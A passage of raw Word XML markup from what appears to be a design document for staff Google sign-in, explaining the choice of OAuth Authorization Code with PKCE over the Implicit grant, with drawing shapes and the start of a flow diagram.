          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0758FC71" w14:textId="77777777" w:rsidR="00095011" w:rsidRDefault="00095011">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677F7726" w14:textId="026211FE"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An administrator creates the staff account and records the work email. The employee proves they control that mailbox by signing in with Google. Two different parties are involved, which is the point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AE66A" w14:textId="568FF18F" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="321"/>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It also raises the floor under administrator accounts: an admin signing in with Google is protected by whatever 2FA is on that Google account the nearest thing to MFA this project delivers (see NF-3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3642C7" w14:textId="77777777" w:rsidR="00345BB3"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6.2 Why Authorization Code + PKCE, and not Implicit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EDD0C7" w14:textId="77777777" w:rsidR="00095011" w:rsidRPr="00095011" w:rsidRDefault="00095011" w:rsidP="00095011">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="05ACB712"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09792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EA79DEA" wp14:editId="3F61EE3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5333106</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18703</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="466726" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28633" name="Group 28633"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="466726" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="466726" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2389" name="Shape 2389"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="466726" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466726" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457201" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459831" y="0"/>
                                  <a:pt x="462076" y="930"/>
                                  <a:pt x="463936" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465796" y="4638"/>
                                  <a:pt x="466726" y="6896"/>
                                  <a:pt x="466726" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466726" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466726" y="126454"/>
                                  <a:pt x="465796" y="128687"/>
                                  <a:pt x="463936" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462076" y="132407"/>
                                  <a:pt x="459831" y="133338"/>
                                  <a:pt x="457201" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2790" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="930"/>
                                  <a:pt x="6895" y="0"/>
                                  <a:pt x="9526"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633" style="width:36.7501pt;height:10.5pt;position:absolute;z-index:-2147483640;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:419.93pt;mso-position-vertical-relative:text;margin-top:-1.47274pt;" coordsize="4667,1333">
                <v:shape id="Shape 2389" style="position:absolute;width:4667;height:1333;left:0;top:0;" coordsize="466726,133350" path="m9526,0l457201,0c459831,0,462076,930,463936,2791c465796,4638,466726,6896,466726,9525l466726,123825c466726,126454,465796,128687,463936,130547c462076,132407,459831,133338,457201,133350l9526,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,1,123825l1,9525c0,6896,930,4638,2790,2791c4650,930,6895,0,9526,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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implicit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> grant returns the access token in the URL fragment, where it lands in browser history, in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers and in any logging proxy on the path. OAuth 2.1 removes it for exactly that reason.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF7DACC"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0816" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AFD0734" wp14:editId="480A3174">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4971157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162607</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28634" name="Group 28634"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="809625" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="809625" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2399" name="Shape 2399"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802729" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808694" y="4638"/>
                                  <a:pt x="809624" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809624" y="126454"/>
                                  <a:pt x="808694" y="128687"/>
                                  <a:pt x="806835" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132407"/>
                                  <a:pt x="802729" y="133338"/>
                                  <a:pt x="800100" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2790" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="930"/>
                                  <a:pt x="6894"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634" style="width:63.75pt;height:10.5pt;position:absolute;z-index:-2147483630;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:391.43pt;mso-position-vertical-relative:text;margin-top:12.8037pt;" coordsize="8096,1333">
                <v:shape id="Shape 2399" style="position:absolute;width:8096;height:1333;left:0;top:0;" coordsize="809625,133350" path="m9525,0l800100,0c802729,0,804975,930,806835,2778c808694,4638,809624,6896,809625,9525l809625,123825c809624,126454,808694,128687,806835,130547c804975,132407,802729,133338,800100,133350l9525,133350c6894,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6896,930,4638,2790,2778c4650,930,6894,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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authorization Code</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> flow returns a short-lived, single-use code instead, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PKCE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFC 7636) binds that code to the browser that began the flow: an attacker who intercepts the code cannot redeem it without the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>code_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>verifier</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p>
    <w:p w14:paraId="15FF3FA6" w14:textId="0B4D0B01" w:rsidR="00095011" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="0011533D">
      <w:pPr>
        <w:spacing w:after="321"/>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1840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A1807A1" wp14:editId="16E99930">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2494657</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28635" name="Group 28635"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="342900" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="342900" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2408" name="Shape 2408"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4638"/>
                                  <a:pt x="342899" y="6896"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342899" y="135979"/>
                                  <a:pt x="341970" y="138212"/>
                                  <a:pt x="340110" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="141932"/>
                                  <a:pt x="336005" y="142863"/>
                                  <a:pt x="3333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8635" style="width:27pt;height:11.25pt;position:absolute;z-index:-2147483621;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:196.43pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="3429,1428">
                <v:shape id="Shape 2408" style="position:absolute;width:3429;height:1428;left:0;top:0;" coordsize="342900,142875" path="m9525,0l333375,0c336005,0,338250,930,340110,2778c341970,4638,342899,6896,342900,9525l342900,133350c342899,135979,341970,138212,340110,140072c338250,141932,336005,142863,333375,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,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We </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>apply</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PKCE even though this is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>confidential</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> client holding a client secret, because the secret protects the backend's identity, not the code in transit. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">S256 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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plain</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> challenge </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the verifier, so anyone who sees the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authorize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> request already has it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBD817" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>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6.3 The flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A9E9F" w14:textId="77777777" w:rsidR="00095011" w:rsidRPr="00095011" w:rsidRDefault="00095011" w:rsidP="00095011">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="185DBFDA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="239"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1AA676EB" wp14:editId="7F2CDCD9">
                <wp:extent cx="6480126" cy="5534025"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="28632" name="Group 28632"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="5534025"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="5534025"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2382" name="Shape 2382"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="5534025"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="5534025">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1439"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5528990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="5532562"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="5533529"/>
                                  <a:pt x="6470001" y="5534013"/>
                                  <a:pt x="6467474" y="5534025"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="5534025"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="5534013"/>
                                  <a:pt x="14094" y="5533529"/>
                                  <a:pt x="11760" y="5532562"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="5531594"/>
                                  <a:pt x="7366" y="5530218"/>
                                  <a:pt x="5580" y="5528444"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="5526646"/>
                                  <a:pt x="2417" y="5524587"/>
                                  <a:pt x="1450" y="5522255"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="5514975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11745"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7355"/>
                                  <a:pt x="5580" y="5569"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3783"/>
                                  <a:pt x="9426" y="2406"/>
                                  <a:pt x="11760" y="1439"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14094" y="484"/>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2415" name="Rectangle 2415"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="145504"/>
                            <a:ext cx="72437" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="486C4CB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16" name="Rectangle 2416"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="155228" y="145504"/>
                            <a:ext cx="4708373" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6CC2B9E3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>Browser                    Our backend                     Google</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2417" name="Rectangle 2417"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="316954"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="243FA763"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18" name="Rectangle 2418"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="316954"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1B2C1D06" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2419" name="Rectangle 2419"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="488404"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7DE6B80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0" name="Rectangle 2420"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="488404"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2220BA0C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
